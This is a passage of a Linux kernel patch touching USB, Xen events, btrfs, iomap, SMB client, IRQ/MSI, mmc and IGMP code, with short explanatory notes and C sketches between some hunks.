+ 	config->desc.bNumInterfaces = nintf = n;
+ 
+ 	/* Check for missing interface numbers */
+@@ -754,7 +754,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 				break;
+ 		}
+ 		if (j >= nintf)
+-			dev_warn(ddev, "config %d has no interface number "
++			dev_notice(ddev, "config %d has no interface number "
+ 			    "%d\n", cfgno, i);
+ 	}
+ 
+@@ -762,7 +762,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 	for (i = 0; i < nintf; ++i) {
+ 		j = nalts[i];
+ 		if (j > USB_MAXALTSETTING) {
+-			dev_warn(ddev, "too many alternate settings for "
++			dev_notice(ddev, "too many alternate settings for "
+ 			    "config %d interface %d: %d, "
+ 			    "using maximum allowed: %d\n",
+ 			    cfgno, inums[i], j, USB_MAXALTSETTING);
+@@ -811,7 +811,7 @@ static int usb_parse_configuration(struct usb_device *dev, int cfgidx,
+ 					break;
+ 			}
+ 			if (n >= intfc->num_altsetting)
+-				dev_warn(ddev, "config %d interface %d has no "
++				dev_notice(ddev, "config %d interface %d has no "
+ 				    "altsetting %d\n", cfgno, inums[i], j);
+ 		}
+ 	}
+@@ -868,7 +868,7 @@ int usb_get_configuration(struct usb_device *dev)
+ 	int result;
+ 
+ 	if (ncfg > USB_MAXCONFIG) {
+-		dev_warn(ddev, "too many configurations: %d, "
++		dev_notice(ddev, "too many configurations: %d, "
+ 		    "using maximum allowed: %d\n", ncfg, USB_MAXCONFIG);
+ 		dev->descriptor.bNumConfigurations = ncfg = USB_MAXCONFIG;
+ 	}
+@@ -902,7 +902,7 @@ int usb_get_configuration(struct usb_device *dev)
+ 			    "descriptor/%s: %d\n", cfgno, "start", result);
+ 			if (result != -EPIPE)
+ 				goto err;
+-			dev_err(ddev, "chopping to %d config(s)\n", cfgno);
++			dev_notice(ddev, "chopping to %d config(s)\n", cfgno);
+ 			dev->descriptor.bNumConfigurations = cfgno;
+ 			break;
+ 		} else if (result < 4) {
+@@ -934,7 +934,7 @@ int usb_get_configuration(struct usb_device *dev)
+ 			goto err;
+ 		}
+ 		if (result < length) {
+-			dev_warn(ddev, "config index %d descriptor too short "
++			dev_notice(ddev, "config index %d descriptor too short "
+ 			    "(expected %i, got %i)\n", cfgno, length, result);
+ 			length = result;
+ 		}
+@@ -993,7 +993,7 @@ int usb_get_bos_descriptor(struct usb_device *dev)
+ 	/* Get BOS descriptor */
+ 	ret = usb_get_descriptor(dev, USB_DT_BOS, 0, bos, USB_DT_BOS_SIZE);
+ 	if (ret < USB_DT_BOS_SIZE || bos->bLength < USB_DT_BOS_SIZE) {
+-		dev_err(ddev, "unable to get BOS descriptor or descriptor too short\n");
++		dev_notice(ddev, "unable to get BOS descriptor or descriptor too short\n");
+ 		if (ret >= 0)
+ 			ret = -ENOMSG;
+ 		kfree(bos);
+@@ -1021,7 +1021,7 @@ int usb_get_bos_descriptor(struct usb_device *dev)
+ 
+ 	ret = usb_get_descriptor(dev, USB_DT_BOS, 0, buffer, total_len);
+ 	if (ret < total_len) {
+-		dev_err(ddev, "unable to get BOS descriptor set\n");
++		dev_notice(ddev, "unable to get BOS descriptor set\n");
+ 		if (ret >= 0)
+ 			ret = -ENOMSG;
+ 		goto err;
+@@ -1046,8 +1046,8 @@ int usb_get_bos_descriptor(struct usb_device *dev)
+ 		}
+ 
+ 		if (cap->bDescriptorType != USB_DT_DEVICE_CAPABILITY) {
+-			dev_warn(ddev, "descriptor type invalid, skip\n");
+-			continue;
++			dev_notice(ddev, "descriptor type invalid, skip\n");
++			goto skip_to_next_descriptor;
+ 		}
+ 
+ 		switch (cap_type) {
+@@ -1081,6 +1081,7 @@ int usb_get_bos_descriptor(struct usb_device *dev)
+ 			break;
+ 		}
+ 
++skip_to_next_descriptor:
+ 		total_len -= length;
+ 		buffer += length;
+ 	}
+diff --git a/drivers/usb/host/xhci-plat.c b/drivers/usb/host/xhci-plat.c
+index c9a101f0e8d01..c9438dc56f5fc 100644
+--- a/drivers/usb/host/xhci-plat.c
++++ b/drivers/usb/host/xhci-plat.c
+@@ -184,7 +184,7 @@ static int xhci_plat_probe(struct platform_device *pdev)
+ 	int			ret;
+ 	int			irq;
+ 	struct xhci_plat_priv	*priv = NULL;
+-
++	bool			of_match;
+ 
+ 	if (usb_disabled())
+ 		return -ENODEV;
+@@ -305,16 +305,23 @@ static int xhci_plat_probe(struct platform_device *pdev)
+ 					 &xhci->imod_interval);
+ 	}
+ 
+-	hcd->usb_phy = devm_usb_get_phy_by_phandle(sysdev, "usb-phy", 0);
+-	if (IS_ERR(hcd->usb_phy)) {
+-		ret = PTR_ERR(hcd->usb_phy);
+-		if (ret == -EPROBE_DEFER)
+-			goto disable_clk;
+-		hcd->usb_phy = NULL;
+-	} else {
+-		ret = usb_phy_init(hcd->usb_phy);
+-		if (ret)
+-			goto disable_clk;
++	/*
++	 * Drivers such as dwc3 manage PHYs themselves (and rely on driver name
++	 * matching for the xhci platform device).
++	 */
++	of_match = of_match_device(pdev->dev.driver->of_match_table, &pdev->dev);
++	if (of_match) {
++		hcd->usb_phy = devm_usb_get_phy_by_phandle(sysdev, "usb-phy", 0);
++		if (IS_ERR(hcd->usb_phy)) {
++			ret = PTR_ERR(hcd->usb_phy);
++			if (ret == -EPROBE_DEFER)
++				goto disable_clk;
++			hcd->usb_phy = NULL;
++		} else {
++			ret = usb_phy_init(hcd->usb_phy);
++			if (ret)
++				goto disable_clk;
++		}
+ 	}
+ 
+ 	hcd->tpl_support = of_usb_host_tpl_support(sysdev->of_node);
+diff --git a/drivers/video/fbdev/sticore.h b/drivers/video/fbdev/sticore.h
+index 0ebdd28a0b813..d83ab3ded5f3d 100644
+--- a/drivers/video/fbdev/sticore.h
++++ b/drivers/video/fbdev/sticore.h
+@@ -231,7 +231,7 @@ struct sti_rom_font {
+ 	 u8 height;
+ 	 u8 font_type;		/* language type */
+ 	 u8 bytes_per_char;
+-	u32 next_font;
++	s32 next_font;		/* note: signed int */
+ 	 u8 underline_height;
+ 	 u8 underline_pos;
+ 	 u8 res008[2];
+diff --git a/drivers/xen/events/events_base.c b/drivers/xen/events/events_base.c
+index af9115d648092..00f8e349921d4 100644
+--- a/drivers/xen/events/events_base.c
++++ b/drivers/xen/events/events_base.c
+@@ -1710,9 +1710,10 @@ void handle_irq_for_port(evtchn_port_t port, struct evtchn_loop_ctrl *ctrl)
+ 	generic_handle_irq(irq);
+ }
+ 
+-static void __xen_evtchn_do_upcall(void)
++int xen_evtchn_do_upcall(void)
+ {
+ 	struct vcpu_info *vcpu_info = __this_cpu_read(xen_vcpu);
++	int ret = vcpu_info->evtchn_upcall_pending ? IRQ_HANDLED : IRQ_NONE;
+ 	int cpu = smp_processor_id();
+ 	struct evtchn_loop_ctrl ctrl = { 0 };
+ 
+@@ -1744,25 +1745,10 @@ static void __xen_evtchn_do_upcall(void)
+ 	 * above.
+ 	 */
+ 	__this_cpu_inc(irq_epoch);
+-}
+-
+-void xen_evtchn_do_upcall(struct pt_regs *regs)
+-{
+-	struct pt_regs *old_regs = set_irq_regs(regs);
+-
+-	irq_enter();
+-
+-	__xen_evtchn_do_upcall();
+ 
+-	irq_exit();
+-	set_irq_regs(old_regs);
+-}
+-
+-void xen_hvm_evtchn_do_upcall(void)
+-{
+-	__xen_evtchn_do_upcall();
++	return ret;
+ }
+-EXPORT_SYMBOL_GPL(xen_hvm_evtchn_do_upcall);
++EXPORT_SYMBOL_GPL(xen_evtchn_do_upcall);
+ 
+ /* Rebind a new event channel to an existing irq. */
+ void rebind_evtchn_irq(evtchn_port_t evtchn, int irq)
+diff --git a/drivers/xen/platform-pci.c b/drivers/xen/platform-pci.c
+index cd07e3fed0faf..544d3f9010b92 100644
+--- a/drivers/xen/platform-pci.c
++++ b/drivers/xen/platform-pci.c
+@@ -64,14 +64,13 @@ static uint64_t get_callback_via(struct pci_dev *pdev)
+ 
+ static irqreturn_t do_hvm_evtchn_intr(int irq, void *dev_id)
+ {
+-	xen_hvm_evtchn_do_upcall();
+-	return IRQ_HANDLED;
++	return xen_evtchn_do_upcall();
+ }
+ 
+ static int xen_allocate_irq(struct pci_dev *pdev)
+ {
+ 	return request_irq(pdev->irq, do_hvm_evtchn_intr,
+-			IRQF_NOBALANCING | IRQF_TRIGGER_RISING,
++			IRQF_NOBALANCING | IRQF_SHARED,
+ 			"xen-platform-pci", pdev);
+ }
+ 
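
Merging the two upcall entry points into one that returns an irqreturn_t is what makes the switch from IRQF_TRIGGER_RISING to IRQF_SHARED safe: a shared handler must tell the core whether the line was really its device's, decided here from evtchn_upcall_pending. In sketch form:

    #include <stdbool.h>
    #include <stdio.h>

    enum irqreturn { IRQ_NONE, IRQ_HANDLED };

    static bool upcall_pending;     /* stand-in for vcpu_info state */

    static enum irqreturn evtchn_upcall(void)
    {
        enum irqreturn ret = upcall_pending ? IRQ_HANDLED : IRQ_NONE;

        /* ...scan and handle pending event channels... */
        upcall_pending = false;
        return ret;
    }

    int main(void)
    {
        upcall_pending = true;
        printf("ours:     %d\n", evtchn_upcall());  /* 1 = handled */
        printf("not ours: %d\n", evtchn_upcall());  /* 0 = none */
        return 0;
    }
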
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index d1dae29a3d012..40152458e7b74 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -3493,6 +3493,7 @@ int __cold open_ctree(struct super_block *sb, struct btrfs_fs_devices *fs_device
+ 		goto fail_alloc;
+ 	}
+ 
++	btrfs_info(fs_info, "first mount of filesystem %pU", disk_super->fsid);
+ 	/*
+ 	 * Verify the type first, if that or the checksum value are
+ 	 * corrupted, we'll find out
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index e015e1e025b6e..dc6e3cce747c1 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -5236,6 +5236,7 @@ static int _btrfs_ioctl_send(struct inode *inode, void __user *argp, bool compat
+ 		arg->clone_sources = compat_ptr(args32.clone_sources);
+ 		arg->parent_root = args32.parent_root;
+ 		arg->flags = args32.flags;
++		arg->version = args32.version;
+ 		memcpy(arg->reserved, args32.reserved,
+ 		       sizeof(args32.reserved));
+ #else
+diff --git a/fs/btrfs/ref-verify.c b/fs/btrfs/ref-verify.c
+index a248f46cfe728..4b052d4009d31 100644
+--- a/fs/btrfs/ref-verify.c
++++ b/fs/btrfs/ref-verify.c
+@@ -788,6 +788,7 @@ int btrfs_ref_tree_mod(struct btrfs_fs_info *fs_info,
+ 			dump_ref_action(fs_info, ra);
+ 			kfree(ref);
+ 			kfree(ra);
++			kfree(re);
+ 			goto out_unlock;
+ 		} else if (be->num_refs == 0) {
+ 			btrfs_err(fs_info,
+@@ -797,6 +798,7 @@ int btrfs_ref_tree_mod(struct btrfs_fs_info *fs_info,
+ 			dump_ref_action(fs_info, ra);
+ 			kfree(ref);
+ 			kfree(ra);
++			kfree(re);
+ 			goto out_unlock;
+ 		}
+ 
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index 547b5c2292186..4a4d65b5e24f7 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -7885,7 +7885,7 @@ long btrfs_ioctl_send(struct inode *inode, struct btrfs_ioctl_send_args *arg)
+ 	}
+ 
+ 	sctx->send_filp = fget(arg->send_fd);
+-	if (!sctx->send_filp) {
++	if (!sctx->send_filp || !(sctx->send_filp->f_mode & FMODE_WRITE)) {
+ 		ret = -EBADF;
+ 		goto out;
+ 	}
+diff --git a/fs/btrfs/super.c b/fs/btrfs/super.c
+index 2c562febd801e..6fc5fa18d1ee6 100644
+--- a/fs/btrfs/super.c
++++ b/fs/btrfs/super.c
+@@ -391,7 +391,10 @@ void __btrfs_panic(struct btrfs_fs_info *fs_info, const char *function,
+ 
+ static void btrfs_put_super(struct super_block *sb)
+ {
+-	close_ctree(btrfs_sb(sb));
++	struct btrfs_fs_info *fs_info = btrfs_sb(sb);
++
++	btrfs_info(fs_info, "last unmount of filesystem %pU", fs_info->fs_devices->fsid);
++	close_ctree(fs_info);
+ }
+ 
+ enum {
+diff --git a/fs/btrfs/volumes.c b/fs/btrfs/volumes.c
+index e62b4c139a72d..6fc2d99270c18 100644
+--- a/fs/btrfs/volumes.c
++++ b/fs/btrfs/volumes.c
+@@ -3074,15 +3074,16 @@ struct extent_map *btrfs_get_chunk_map(struct btrfs_fs_info *fs_info,
+ 	read_unlock(&em_tree->lock);
+ 
+ 	if (!em) {
+-		btrfs_crit(fs_info, "unable to find logical %llu length %llu",
++		btrfs_crit(fs_info,
++			   "unable to find chunk map for logical %llu length %llu",
+ 			   logical, length);
+ 		return ERR_PTR(-EINVAL);
+ 	}
+ 
+-	if (em->start > logical || em->start + em->len < logical) {
++	if (em->start > logical || em->start + em->len <= logical) {
+ 		btrfs_crit(fs_info,
+-			   "found a bad mapping, wanted %llu-%llu, found %llu-%llu",
+-			   logical, length, em->start, em->start + em->len);
++			   "found a bad chunk map, wanted %llu-%llu, found %llu-%llu",
++			   logical, logical + length, em->start, em->start + em->len);
+ 		free_extent_map(em);
+ 		return ERR_PTR(-EINVAL);
+ 	}
+diff --git a/fs/iomap/direct-io.c b/fs/iomap/direct-io.c
+index 4eb559a16c9ed..105c4a1d20a20 100644
+--- a/fs/iomap/direct-io.c
++++ b/fs/iomap/direct-io.c
+@@ -94,7 +94,6 @@ ssize_t iomap_dio_complete(struct iomap_dio *dio)
+ 		if (offset + ret > dio->i_size &&
+ 		    !(dio->flags & IOMAP_DIO_WRITE))
+ 			ret = dio->i_size - offset;
+-		iocb->ki_pos += ret;
+ 	}
+ 
+ 	/*
+@@ -120,18 +119,19 @@ ssize_t iomap_dio_complete(struct iomap_dio *dio)
+ 	}
+ 
+ 	inode_dio_end(file_inode(iocb->ki_filp));
+-	/*
+-	 * If this is a DSYNC write, make sure we push it to stable storage now
+-	 * that we've written data.
+-	 */
+-	if (ret > 0 && (dio->flags & IOMAP_DIO_NEED_SYNC))
+-		ret = generic_write_sync(iocb, ret);
+-
+-	if (ret > 0)
+-		ret += dio->done_before;
++	if (ret > 0) {
++		iocb->ki_pos += ret;
+ 
++		/*
++		 * If this is a DSYNC write, make sure we push it to stable
++		 * storage now that we've written data.
++		 */
++		if (dio->flags & IOMAP_DIO_NEED_SYNC)
++			ret = generic_write_sync(iocb, ret);
++		if (ret > 0)
++			ret += dio->done_before;
++	}
+ 	kfree(dio);
+-
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(iomap_dio_complete);
+diff --git a/fs/smb/client/inode.c b/fs/smb/client/inode.c
+index 05516309ec3ab..7be51f9d2fa18 100644
+--- a/fs/smb/client/inode.c
++++ b/fs/smb/client/inode.c
+@@ -772,6 +772,8 @@ static void cifs_open_info_to_fattr(struct cifs_fattr *fattr, struct cifs_open_i
+ 	}
+ 
+ 	if (S_ISLNK(fattr->cf_mode)) {
++		if (likely(data->symlink_target))
++			fattr->cf_eof = strnlen(data->symlink_target, PATH_MAX);
+ 		fattr->cf_symlink_target = data->symlink_target;
+ 		data->symlink_target = NULL;
+ 	}
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 4cc56e4695fbc..e628848a1df93 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -3424,6 +3424,7 @@ static long smb3_zero_range(struct file *file, struct cifs_tcon *tcon,
+ 	struct inode *inode = file_inode(file);
+ 	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+ 	struct cifsFileInfo *cfile = file->private_data;
++	unsigned long long new_size;
+ 	long rc;
+ 	unsigned int xid;
+ 	__le64 eof;
+@@ -3454,10 +3455,15 @@ static long smb3_zero_range(struct file *file, struct cifs_tcon *tcon,
+ 	/*
+ 	 * do we also need to change the size of the file?
+ 	 */
+-	if (keep_size == false && i_size_read(inode) < offset + len) {
+-		eof = cpu_to_le64(offset + len);
++	new_size = offset + len;
++	if (keep_size == false && (unsigned long long)i_size_read(inode) < new_size) {
++		eof = cpu_to_le64(new_size);
+ 		rc = SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
+ 				  cfile->fid.volatile_fid, cfile->pid, &eof);
++		if (rc >= 0) {
++			truncate_setsize(inode, new_size);
++			fscache_resize_cookie(cifs_inode_cookie(inode), new_size);
++		}
+ 	}
+ 
+  zero_range_exit:
+@@ -3852,6 +3858,9 @@ static long smb3_insert_range(struct file *file, struct cifs_tcon *tcon,
+ 	if (rc < 0)
+ 		goto out_2;
+ 
++	truncate_setsize(inode, old_eof + len);
++	fscache_resize_cookie(cifs_inode_cookie(inode), i_size_read(inode));
++
+ 	rc = smb2_copychunk_range(xid, cfile, cfile, off, count, off + len);
+ 	if (rc < 0)
+ 		goto out_2;
+diff --git a/include/linux/dma-fence.h b/include/linux/dma-fence.h
+index 3dfb994312b1f..b79097b9070b3 100644
+--- a/include/linux/dma-fence.h
++++ b/include/linux/dma-fence.h
+@@ -478,6 +478,21 @@ static inline bool dma_fence_is_later(struct dma_fence *f1,
+ 	return __dma_fence_is_later(f1->seqno, f2->seqno, f1->ops);
+ }
+ 
++/**
++ * dma_fence_is_later_or_same - return true if f1 is later or same as f2
++ * @f1: the first fence from the same context
++ * @f2: the second fence from the same context
++ *
++ * Returns true if f1 is chronologically later than f2 or the same fence. Both
++ * fences must be from the same context, since a seqno is not re-used across
++ * contexts.
++ */
++static inline bool dma_fence_is_later_or_same(struct dma_fence *f1,
++					      struct dma_fence *f2)
++{
++	return f1 == f2 || dma_fence_is_later(f1, f2);
++}
++
+ /**
+  * dma_fence_later - return the chronologically later fence
+  * @f1:	the first fence from the same context
+diff --git a/include/linux/irq.h b/include/linux/irq.h
+index c3eb89606c2b1..06c692cc0accb 100644
+--- a/include/linux/irq.h
++++ b/include/linux/irq.h
+@@ -215,8 +215,6 @@ struct irq_data {
+  * IRQD_SINGLE_TARGET		- IRQ allows only a single affinity target
+  * IRQD_DEFAULT_TRIGGER_SET	- Expected trigger already been set
+  * IRQD_CAN_RESERVE		- Can use reservation mode
+- * IRQD_MSI_NOMASK_QUIRK	- Non-maskable MSI quirk for affinity change
+- *				  required
+  * IRQD_HANDLE_ENFORCE_IRQCTX	- Enforce that handle_irq_*() is only invoked
+  *				  from actual interrupt context.
+  * IRQD_AFFINITY_ON_ACTIVATE	- Affinity is set on activation. Don't call
+@@ -245,10 +243,9 @@ enum {
+ 	IRQD_SINGLE_TARGET		= (1 << 24),
+ 	IRQD_DEFAULT_TRIGGER_SET	= (1 << 25),
+ 	IRQD_CAN_RESERVE		= (1 << 26),
+-	IRQD_MSI_NOMASK_QUIRK		= (1 << 27),
+-	IRQD_HANDLE_ENFORCE_IRQCTX	= (1 << 28),
+-	IRQD_AFFINITY_ON_ACTIVATE	= (1 << 29),
+-	IRQD_IRQ_ENABLED_ON_SUSPEND	= (1 << 30),
++	IRQD_HANDLE_ENFORCE_IRQCTX	= (1 << 27),
++	IRQD_AFFINITY_ON_ACTIVATE	= (1 << 28),
++	IRQD_IRQ_ENABLED_ON_SUSPEND	= (1 << 29),
+ };
+ 
+ #define __irqd_to_state(d) ACCESS_PRIVATE((d)->common, state_use_accessors)
+@@ -423,21 +420,6 @@ static inline bool irqd_can_reserve(struct irq_data *d)
+ 	return __irqd_to_state(d) & IRQD_CAN_RESERVE;
+ }
+ 
+-static inline void irqd_set_msi_nomask_quirk(struct irq_data *d)
+-{
+-	__irqd_to_state(d) |= IRQD_MSI_NOMASK_QUIRK;
+-}
+-
+-static inline void irqd_clr_msi_nomask_quirk(struct irq_data *d)
+-{
+-	__irqd_to_state(d) &= ~IRQD_MSI_NOMASK_QUIRK;
+-}
+-
+-static inline bool irqd_msi_nomask_quirk(struct irq_data *d)
+-{
+-	return __irqd_to_state(d) & IRQD_MSI_NOMASK_QUIRK;
+-}
+-
+ static inline void irqd_set_affinity_on_activate(struct irq_data *d)
+ {
+ 	__irqd_to_state(d) |= IRQD_AFFINITY_ON_ACTIVATE;
+diff --git a/include/linux/mmc/host.h b/include/linux/mmc/host.h
+index 8fdd3cf971a30..8f918f9a1228d 100644
+--- a/include/linux/mmc/host.h
++++ b/include/linux/mmc/host.h
+@@ -450,6 +450,7 @@ struct mmc_host {
+ 	unsigned int		retune_paused:1; /* re-tuning is temporarily disabled */
+ 	unsigned int		retune_crc_disable:1; /* don't trigger retune upon crc */
+ 	unsigned int		can_dma_map_merge:1; /* merging can be used */
++	unsigned int		vqmmc_enabled:1; /* vqmmc regulator is enabled */
+ 
+ 	int			rescan_disable;	/* disable card detection */
+ 	int			rescan_entered;	/* used with nonremovable devices */
+@@ -597,6 +598,8 @@ static inline int mmc_regulator_set_vqmmc(struct mmc_host *mmc,
+ #endif
+ 
+ int mmc_regulator_get_supply(struct mmc_host *mmc);
++int mmc_regulator_enable_vqmmc(struct mmc_host *mmc);
++void mmc_regulator_disable_vqmmc(struct mmc_host *mmc);
+ 
+ static inline int mmc_card_is_removable(struct mmc_host *host)
+ {
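
The mmc/host.h hunk only declares mmc_regulator_enable_vqmmc()/mmc_regulator_disable_vqmmc() and the vqmmc_enabled flag; a plausible shape for such helpers, assuming the flag exists to keep regulator enable/disable calls balanced across probe, resume and retry paths:

    #include <stdbool.h>
    #include <stdio.h>

    struct host { bool vqmmc_enabled; };

    static int regulator_enable(void)   { puts("vqmmc on");  return 0; }
    static void regulator_disable(void) { puts("vqmmc off"); }

    static int enable_vqmmc(struct host *h)
    {
        int ret = 0;

        if (!h->vqmmc_enabled) {
            ret = regulator_enable();
            if (!ret)
                h->vqmmc_enabled = true;
        }
        return ret;
    }

    static void disable_vqmmc(struct host *h)
    {
        if (h->vqmmc_enabled) {
            regulator_disable();
            h->vqmmc_enabled = false;
        }
    }

    int main(void)
    {
        struct host h = { false };

        enable_vqmmc(&h);
        enable_vqmmc(&h);   /* second call is a no-op */
        disable_vqmmc(&h);
        disable_vqmmc(&h);  /* never unbalances the regulator */
        return 0;
    }
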
+diff --git a/include/linux/spi/spi.h b/include/linux/spi/spi.h
+index fbf8c0d95968e..877395e075afe 100644
+--- a/include/linux/spi/spi.h
++++ b/include/linux/spi/spi.h
+@@ -531,6 +531,7 @@ struct spi_controller {
+ #define SPI_CONTROLLER_MUST_TX		BIT(4)	/* Requires tx */
+ 
+ #define SPI_MASTER_GPIO_SS		BIT(5)	/* GPIO CS must select slave */
++#define SPI_CONTROLLER_SUSPENDED	BIT(6)	/* Currently suspended */
+ 
+ 	/* Flag indicating if the allocation of this struct is devres-managed */
+ 	bool			devm_allocated;
+diff --git a/include/scsi/scsi_device.h b/include/scsi/scsi_device.h
+index 5aabc36fb249b..fdc31fdb612da 100644
+--- a/include/scsi/scsi_device.h
++++ b/include/scsi/scsi_device.h
+@@ -167,19 +167,25 @@ struct scsi_device {
+ 	 * power state for system suspend/resume (suspend to RAM and
+ 	 * hibernation) operations.
+ 	 */
+-	bool manage_system_start_stop;
++	unsigned manage_system_start_stop:1;
+ 
+ 	/*
+ 	 * If true, let the high-level device driver (sd) manage the device
+ 	 * power state for runtime device suspend and resume operations.
+ 	 */
+-	bool manage_runtime_start_stop;
++	unsigned manage_runtime_start_stop:1;
+ 
+ 	/*
+ 	 * If true, let the high-level device driver (sd) manage the device
+ 	 * power state for system shutdown (power off) operations.
+ 	 */
+-	bool manage_shutdown;
++	unsigned manage_shutdown:1;
++
++	/*
++	 * If set and if the device is runtime suspended, ask the high-level
++	 * device driver (sd) to force a runtime resume of the device.
++	 */
++	unsigned force_runtime_start_on_system_start:1;
+ 
+ 	unsigned removable:1;
+ 	unsigned changed:1;	/* Data invalid due to media change */
+diff --git a/include/uapi/linux/stddef.h b/include/uapi/linux/stddef.h
+index 7837ba4fe7289..dcd50fb2164a1 100644
+--- a/include/uapi/linux/stddef.h
++++ b/include/uapi/linux/stddef.h
+@@ -27,7 +27,7 @@
+ 	union { \
+ 		struct { MEMBERS } ATTRS; \
+ 		struct TAG { MEMBERS } ATTRS NAME; \
+-	}
++	} ATTRS
+ 
+ /**
+  * __DECLARE_FLEX_ARRAY() - Declare a flexible array usable in a union
+diff --git a/include/xen/events.h b/include/xen/events.h
+index 344081e71584b..b303bd24e2a6c 100644
+--- a/include/xen/events.h
++++ b/include/xen/events.h
+@@ -106,8 +106,7 @@ int irq_from_virq(unsigned int cpu, unsigned int virq);
+ evtchn_port_t evtchn_from_irq(unsigned irq);
+ 
+ int xen_set_callback_via(uint64_t via);
+-void xen_evtchn_do_upcall(struct pt_regs *regs);
+-void xen_hvm_evtchn_do_upcall(void);
++int xen_evtchn_do_upcall(void);
+ 
+ /* Bind a pirq for a physical interrupt to an irq. */
+ int xen_bind_pirq_gsi_to_irq(unsigned gsi,
+diff --git a/kernel/irq/debugfs.c b/kernel/irq/debugfs.c
+index bbcaac64038ef..0b78fac882b2b 100644
+--- a/kernel/irq/debugfs.c
++++ b/kernel/irq/debugfs.c
+@@ -121,7 +121,6 @@ static const struct irq_bit_descr irqdata_states[] = {
+ 	BIT_MASK_DESCR(IRQD_AFFINITY_ON_ACTIVATE),
+ 	BIT_MASK_DESCR(IRQD_MANAGED_SHUTDOWN),
+ 	BIT_MASK_DESCR(IRQD_CAN_RESERVE),
+-	BIT_MASK_DESCR(IRQD_MSI_NOMASK_QUIRK),
+ 
+ 	BIT_MASK_DESCR(IRQD_FORWARDED_TO_VCPU),
+ 
+diff --git a/kernel/irq/msi.c b/kernel/irq/msi.c
+index 77e513e2e5da7..4e462b5f7bbe8 100644
+--- a/kernel/irq/msi.c
++++ b/kernel/irq/msi.c
+@@ -807,7 +807,6 @@ static int msi_handle_pci_fail(struct irq_domain *domain, struct msi_desc *desc,
+ 
+ #define VIRQ_CAN_RESERVE	0x01
+ #define VIRQ_ACTIVATE		0x02
+-#define VIRQ_NOMASK_QUIRK	0x04
+ 
+ static int msi_init_virq(struct irq_domain *domain, int virq, unsigned int vflags)
+ {
+@@ -816,8 +815,6 @@ static int msi_init_virq(struct irq_domain *domain, int virq, unsigned int vflag
+ 
+ 	if (!(vflags & VIRQ_CAN_RESERVE)) {
+ 		irqd_clr_can_reserve(irqd);
+-		if (vflags & VIRQ_NOMASK_QUIRK)
+-			irqd_set_msi_nomask_quirk(irqd);
+ 
+ 		/*
+ 		 * If the interrupt is managed but no CPU is available to
+@@ -877,15 +874,8 @@ int __msi_domain_alloc_irqs(struct irq_domain *domain, struct device *dev,
+ 	 * Interrupt can use a reserved vector and will not occupy
+ 	 * a real device vector until the interrupt is requested.
+ 	 */
+-	if (msi_check_reservation_mode(domain, info, dev)) {
++	if (msi_check_reservation_mode(domain, info, dev))
+ 		vflags |= VIRQ_CAN_RESERVE;
+-		/*
+-		 * MSI affinity setting requires a special quirk (X86) when
+-		 * reservation mode is active.
+-		 */
+-		if (domain->flags & IRQ_DOMAIN_MSI_NOMASK_QUIRK)
+-			vflags |= VIRQ_NOMASK_QUIRK;
+-	}
+ 
+ 	msi_for_each_desc(desc, dev, MSI_DESC_NOTASSOCIATED) {
+ 		ops->set_desc(&arg, desc);
+diff --git a/lib/errname.c b/lib/errname.c
+index 67739b174a8cc..0c336b0f12f60 100644
+--- a/lib/errname.c
++++ b/lib/errname.c
+@@ -111,9 +111,6 @@ static const char *names_0[] = {
+ 	E(ENOSPC),
+ 	E(ENOSR),
+ 	E(ENOSTR),
+-#ifdef ENOSYM
+-	E(ENOSYM),
+-#endif
+ 	E(ENOSYS),
+ 	E(ENOTBLK),
+ 	E(ENOTCONN),
+@@ -144,9 +141,6 @@ static const char *names_0[] = {
+ #endif
+ 	E(EREMOTE),
+ 	E(EREMOTEIO),
+-#ifdef EREMOTERELEASE
+-	E(EREMOTERELEASE),
+-#endif
+ 	E(ERESTART),
+ 	E(ERFKILL),
+ 	E(EROFS),
+diff --git a/net/ipv4/igmp.c b/net/ipv4/igmp.c
+index cbc4816ed7d83..ac53ef7eec915 100644
+--- a/net/ipv4/igmp.c
++++ b/net/ipv4/igmp.c
+@@ -216,8 +216,10 @@ static void igmp_start_timer(struct ip_mc_list *im, int max_delay)
+ 	int tv = prandom_u32_max(max_delay);
+ 
+ 	im->tm_running = 1;
+-	if (!mod_timer(&im->timer, jiffies+tv+2))
+-		refcount_inc(&im->refcnt);
++	if (refcount_inc_not_zero(&im->refcnt)) {
++		if (mod_timer(&im->timer, jiffies + tv + 2))
++			ip_ma_put(im);
++	}
+ }
+ 
+ static void igmp_gq_start_timer(struct in_device *in_dev)
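
The igmp fix inverts the old order: take a reference first, and only if the object is still live (refcount_inc_not_zero), then arm the timer, dropping the extra reference again when mod_timer() reports the timer was already pending and so already holds one. A userspace sketch of inc-not-zero as a CAS loop:

    #include <stdatomic.h>
    #include <stdbool.h>
    #include <stdio.h>

    static atomic_int refcnt = 1;
    static bool timer_was_pending;  /* stand-in for mod_timer()'s result */

    static bool inc_not_zero(atomic_int *r)
    {
        int old = atomic_load(r);

        do {
            if (old == 0)
                return false;   /* object already on its way out */
        } while (!atomic_compare_exchange_weak(r, &old, old + 1));
        return true;
    }

    static void start_timer(void)
    {
        if (inc_not_zero(&refcnt)) {
            if (timer_was_pending)          /* timer already had a ref */
                atomic_fetch_sub(&refcnt, 1);
        }
    }

    int main(void)
    {
        start_timer();
        printf("refcnt = %d\n", atomic_load(&refcnt));  /* 2 */
        timer_was_pending = true;
        start_timer();
        printf("refcnt = %d\n", atomic_load(&refcnt));  /* still 2 */
        return 0;
    }
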
+diff --git a/net/wireless/core.h b/net/wireless/core.h
+index e1accacc6f233..ee980965a7cfb 100644
+--- a/net/wireless/core.h
++++ b/net/wireless/core.h
+@@ -297,6 +297,7 @@ struct cfg80211_cqm_config {
+ 	u32 rssi_hyst;
+ 	s32 last_rssi_event_value;
